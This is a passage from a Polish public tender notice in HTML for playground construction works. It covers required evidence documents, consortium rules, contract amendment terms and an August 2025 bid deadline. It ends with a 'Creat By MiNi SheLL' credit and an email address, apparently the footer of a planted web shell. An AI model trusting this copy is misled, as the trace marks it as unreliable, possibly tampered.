jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne<br/>odpowiednie dokumenty;<br/>3) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;<br/>2. Na podstawie art. 128 ust. 1 ustawy, jeżeli wykonawca nie złoży oświadczenia, o którym mowa w art. 125 ust. 1 ustawy,<br/>podmiotowych środków dowodowych, innych dokumentów lub oświadczeń składanych w postępowaniu lub będą one niekompletne<br/>lub będą zawierać błędy, zamawiający wezwie wykonawcę odpowiednio do ich złożenia, poprawienia lub uzupełnienia w<br/>wyznaczonym terminie z zastrzeżeniem art. 128 ust. 1 pkt 1 i 2 ustawy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W przypadku złożenia oferty równoważnej Wykonawca jest zobowiązany dołączyć do oferty:<br/>a) koncepcję zagospodarowania terenu udowadniając, iż oferowane produkty spełniają założenia projektu, bez<br/>powiększenia powierzchni placu i wykonywanej nawierzchni bezpiecznej.<br/>b) karty techniczne urządzeń w celu porównania równoważności funkcjonalnej i technologicznej. Zaproponowane karty<br/>techniczne urządzeń winny zawierać: wizualizację produktu, parametry wielkościowe, materiałowe, technologiczne,<br/>zestawienie elementów oraz funkcjonalności poszczególnych urządzeń zabawowych. Przedłożone certyfikaty powinny być<br/>aktualne. Tolerancja podanych wymiarów w zakresie +/- 10%. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> W przypadku złożenia oferty równoważnej Wykonawca jest zobowiązany dołączyć do oferty:<br/>a) koncepcję zagospodarowania terenu udowadniając, iż oferowane produkty spełniają założenia projektu, bez<br/>powiększenia powierzchni placu i wykonywanej nawierzchni bezpiecznej.<br/>b) karty techniczne urządzeń w celu porównania równoważności funkcjonalnej i technologicznej. Zaproponowane karty<br/>techniczne urządzeń winny zawierać: wizualizację produktu, parametry wielkościowe, materiałowe, technologiczne,<br/>zestawienie elementów oraz funkcjonalności poszczególnych urządzeń zabawowych. Przedłożone certyfikaty powinny być<br/>aktualne. Tolerancja podanych wymiarów w zakresie +/- 10%. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Dokumenty wymagane przez zamawiającego, które należy złożyć składając ofertę:<br/>1) formularz oferty, według wzoru stanowiącego załącznik nr 1 do SWZ;<br/>2) odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub<br/>innego właściwego rejestru, w celu potwierdzenia, że osoba działająca w imieniu (odpowiednio: wykonawcy lub podmiotu<br/>udostępniającego zasoby) jest umocowana do jego reprezentowania; wykonawca nie jest zobowiązany do złożenia ww.<br/>dokumentów, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca<br/>wskazał w załączniku nr 1 do SWZ (formularz oferty) dane umożliwiające dostęp do tych dokumentów.<br/>3) pełnomocnictwa lub inne dokumenty potwierdzające umocowanie do reprezentowania (odpowiednio: wykonawcy,<br/>podmiotu udostępniającego zasoby, wykonawców wspólnie ubiegających się o udzielenie zamówienia), jeżeli w imieniu<br/>(odpowiednio: wykonawcy, podmiotu udostępniającego zasoby, wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia) działa osoba, której umocowanie do reprezentowania nie wynika z dokumentów, o których mowa w pkt 1 ppkt<br/>2)<br/>4) oświadczenie wykonawcy o niepodleganiu wykluczeniu, według wzoru stanowiącego załącznik nr 2 do SWZ;<br/>Uwaga! W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia ww. dokument składa każdy z<br/>wykonawców.<br/>5) oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, według wzoru stanowiącego załącznik nr 3 do<br/>SWZ;<br/>Uwaga! W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia ww. dokument składa każdy z<br/>wykonawców, w zakresie, w jakim wykazuje spełnianie warunków udziału w postępowaniu.<br/>6) oświadczenie wykonawcy o poleganiu na zdolnościach lub sytuacji podmiotów udostępniających zasoby, według wzoru<br/>stanowiącego załącznik nr 1 do SWZ;<br/>Uwaga! Ww. dokument należy złożyć tylko wtedy, gdy wykonawca polega na zdolnościach lub sytuacji podmiotu<br/>udostępniającego zasoby.<br/>7) zobowiązanie podmiotu udostępniającego zasoby do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia wraz z oświadczeniem podmiotu udostępniającego zasoby, potwierdzającym brak<br/>podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca<br/>powołuje się na jego zasoby (wg wzoru stanowiącego załącznik nr 5 do SWZ). Zobowiązanie podmiotu udostępniającego<br/>zasoby może być zastąpione innym podmiotowym środkiem dowodowym potwierdzającym, że wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tego podmiotu;<br/>Uwaga! Ww. dokument należy złożyć tylko wtedy, gdy wykonawca polega na zdolnościach lub sytuacji podmiotu<br/>udostępniającego zasoby.<br/>8) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia wskazujące, które roboty budowlane,<br/>dostawy lub usługi wykonają poszczególni wykonawcy, według wzoru stanowiącego załącznik nr 1 do SWZ.<br/>Uwaga! Ww. dokument należy złożyć w przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy.<br/>2. Pełnomocnictwo, o którym mowa w pkt 1 należy dołączyć do oferty.<br/>3. Wszelką korespondencję w postępowaniu zamawiający kieruje do pełnomocnika.<br/>4. Wspólnicy spółki cywilnej są wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia i mają do nich<br/>zastosowanie zasady określone w pkt 1 – 3.<br/>5. Przed zawarciem umowy wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą mieli obowiązek przedstawić<br/>zamawiającemu kopię umowy regulującej współpracę tych wykonawców, zawierającą, co najmniej:<br/>1) zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację<br/>przedmiotu zamówienia,<br/>2) określenie zakresu działania poszczególnych stron umowy,<br/>3) czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana postanowień umowy wymaga formy pisemnej pod rygorem nieważności.<br/>2. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy, polegających na: zmianie terminu<br/>wykonania przedmiotu umowy, zmianie wynagrodzenia, zmianie sposobu spełnienia świadczenia oraz zmianie osób<br/>wskazanych do realizacji zamówienia.<br/>3. Zmiana terminu wykonania przedmiotu umowy może nastąpić w następujących przypadkach:<br/>1) w sytuacji, gdy w okresie realizacji przedmiotu umowy nastąpią niesprzyjające warunki atmosferyczne, np. intensywne<br/>opady deszczu, wichury, ujemne temperatury uniemożliwiające zachowanie reżimów technologicznych, powodujące<br/>wstrzymanie robót budowlanych przez okres co najmniej 5 dni roboczych następujących po sobie i będzie to miało wpływ na<br/>termin wykonania przedmiotu umowy. Przedłużenie terminu Zamawiający warunkuje złożeniem przez Wykonawcę<br/>stosownego wniosku oraz dokumentów wskazujących, że zachowanie wymogów technologicznych w danych warunkach<br/>atmosferycznych jest niemożliwe (informacja o stanie pogody z Biura Prognoz),<br/>2) w sytuacji, gdy wystąpią nieprzewidziane warunki realizacji, odmienne od przyjętych w dokumentacji, np. odkrycie<br/>niezinwentaryzowanych przedmiotów lub obiektów i będzie to miało wpływ na termin wykonania zamówienia,<br/>3) w przypadku konieczności dokonania zmian w dokumentacji projektowej lub wykonania dokumentacji zamiennej, gdy<br/>czas na jej wykonanie spowoduje wydłużenie realizacji przedmiotu umowy,<br/>4) w przypadku wystąpienia robót zamiennych w stosunku do przewidzianych w dokumentacji projektowej, w sytuacji, gdy<br/>wykonanie tych robót będzie niezbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na<br/>dzień odbioru robót przepisami, wykonania przedmiotu umowy;<br/>5) w przypadku konieczności realizacji zamówienia dodatkowego lub robót dodatkowych, mających wpływ na termin<br/>wykonania zamówienia,<br/>6) w przypadku wystąpienia niezinwentaryzowanych lub błędnie zinwentaryzowanych sieci, instalacji lub innych obiektów w<br/>stosunku do danych wynikających z dokumentacji projektowej przekazanej przez Zamawiającego, co spowodowało<br/>wstrzymanie wykonania robót budowlanych, konieczność zmiany dokumentacji projektowej lub wykonania robót<br/>dodatkowych lub zamiennych.<br/>7) w sytuacji zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie postanowień umowy<br/>do aktualnego stanu prawnego,<br/>8) w sytuacji, gdy nastąpi odmowa wydania przez organ administracji lub inne podmioty wymaganych decyzji, zezwoleń,<br/>uzgodnień z przyczyn nie zawinionych przez Wykonawcę;<br/>9) w sytuacji, gdy wystąpi potrzeba uzyskania zmiany decyzji o pozwoleniu na budowę w wyniku wprowadzenia<br/>koniecznych, istotnych zmian w projekcie budowlanym;<br/>5. Zmiana skutkująca zmianą wysokości wynagrodzenia może nastąpić w związku ze zmianą sposobu spełnienia<br/>świadczenia, ograniczeniem zakresu robót lub wprowadzeniem robót zamiennych. Wykonawca wykona wycenę robót<br/>wynikających ze zmiany sposobu prowadzenia robót oraz robót zamiennych w formie kosztorysu sporządzonego metodą<br/>wskazaną poniżej, przy zastosowaniu następujących czynników cenotwórczych wskazanych w dostępnych publikacjach na<br/>rynku np. Sekocenbud, Orgbud, Wacetob aktualnego na dzień sporządzenia kosztorysu (wybór publikacji przez Wykonawcę<br/>wymaga akceptacji Zamawiającego):<br/>1) stawka roboczogodziny „R” – średnia dla woj. Kujawsko-Pomorskiego,<br/>2) koszty pośrednie „Kp” – średnie dla woj. Kujawsko-Pomorskiego,<br/>3) zysk kalkulacyjny „Z” (R+S+Kp) – średnie dla woj. Kujawsko-Pomorskiego,<br/>4) ceny jednostkowe sprzętu i materiałów (łącznie z kosztami zakupu) będą przyjmowane według średnich cen rynkowych, a<br/>w przypadku ich braku ceny materiałów i sprzętu zostaną przyjęte na podstawie ogólnie dostępnych katalogów, w tym<br/>również cen dostawców na stronach internetowych, ofert handlowych itp.,<br/>Pozostałe zmiany umowy zostały określone w Rozdziale XIV SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-27 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1158959</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-27 08:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com